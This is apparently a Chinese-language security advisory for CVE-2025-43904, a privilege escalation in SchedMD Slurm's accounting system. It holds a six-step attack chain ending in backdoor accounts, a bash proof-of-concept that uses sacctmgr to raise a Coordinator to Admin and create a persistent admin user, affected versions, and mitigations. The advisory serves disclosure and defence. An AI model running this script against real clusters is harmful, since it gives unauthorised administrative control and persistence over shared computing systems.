CVE-2025-43904: SchedMD Slurm accounting系统权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-43904

漏洞类型

权限提升

CVSS评分

4.2 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SchedMD Slurm

漏洞概述

CVE-2025-43904是SchedMD Slurm中的一个中危权限提升漏洞，CVSS评分4.2。该漏洞存在于Slurm的accounting系统中，允许Coordinator（协调员）将普通用户提升为Administrator（管理员）权限。SchedMD Slurm是一款开源的工作负载管理器，广泛应用于高性能计算(HPC)集群环境，用于作业调度、资源管理和节点协调。攻击者利用该漏洞需要具备低权限用户身份（Coordinator角色），通过网络远程发起攻击。漏洞的成功利用将导致攻击者获得系统管理员权限，从而完全控制Slurm集群，可能造成敏感数据泄露、系统配置篡改、作业调度被恶意操纵等严重后果。该漏洞影响多个版本，包括24.11.5之前的主版本、24.05.8之前的版本以及23.11.11之前的版本。

技术细节

该漏洞根源于SchedMD Slurm的accounting系统中权限验证机制存在缺陷。在Slurm架构中，Coordinator角色原本设计用于协调和管理特定队列或项目的作业调度，但该角色的权限边界定义不清晰。攻击者（具有Coordinator权限的恶意用户）可以通过构造特定的API请求或使用sacctmgr等管理工具，向accounting数据库发送权限变更请求。由于系统未能正确验证Coordinator角色的权限范围，错误地允许其修改用户属性包括accounting管理员权限。具体来说，当Coordinator尝试通过sacctmgr命令设置其他用户的AdminLevel属性时，系统未能进行充分的权限检查，导致Coordinator可以将任意用户提升为Admin级别。攻击成功后，被提升的用户将获得完整的Slurm管理权限，包括作业控制、节点管理、配置修改等特权操作。

攻击链分析

STEP 1

步骤1

攻击者获取Slurm集群的Coordinator角色账户，可以通过社工、弱口令或已泄露凭证等方式获得低权限访问

STEP 2

步骤2

攻击者使用sacctmgr工具连接到Slurm controller，验证自身Coordinator权限

STEP 3

步骤3

攻击者构造恶意请求，通过sacctmgr modify user命令修改自身或其他用户的AdminLevel属性，将权限提升为Admin

STEP 4

步骤4

系统未能正确验证Coordinator角色的权限范围，错误地执行权限提升操作

STEP 5

步骤5

攻击者获得Administrator权限后，可完全控制Slurm集群，包括作业调度、节点管理、配置修改等

STEP 6

步骤6

攻击者创建持久化后门账户或窃取敏感数据，完成攻击目标

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-43904 PoC - Slurm Coordinator Privilege Escalation
# Requirements: Valid Coordinator account on vulnerable Slurm instance

SLURM_USER="coordinator_user"
TARGET_USER="attacker"
SLURMCTRLD_HOST="slurm-controller.local"

# Step 1: Verify current user has Coordinator role
echo "[+] Checking Coordinator privileges..."
sacctmgr -i show user $SLURM_USER format=AdminLevel

# Step 2: Attempt to escalate privileges to Administrator
echo "[+] Attempting privilege escalation..."
sacctmgr -i modify user where name=$SLURM_USER set AdminLevel=Admin

# Step 3: Verify privilege escalation
echo "[+] Verifying new privileges..."
sacctmgr -i show user $SLURM_USER format=AdminLevel

# Step 4: Create new admin user for persistence
echo "[+] Creating persistent admin user..."
sacctmgr -i create user name=$TARGET_USER admin=admin

echo "[!] If successful, $SLURM_USER now has Administrator privileges"

影响范围

SchedMD Slurm < 24.11.5

SchedMD Slurm < 24.05.8

SchedMD Slurm < 23.11.11

防御指南

临时缓解措施

在官方补丁发布前，可通过以下措施临时缓解风险：1) 严格限制Coordinator角色的账户数量和分配范围；2) 启用Slurm的审计日志功能，实时监控sacctmgr命令的使用情况；3) 对所有accounting权限变更操作实施双人审批机制；4) 配置网络访问控制，限制对Slurm管理接口的非授权访问；5) 定期检查用户权限分配日志，检测异常的权限提升行为。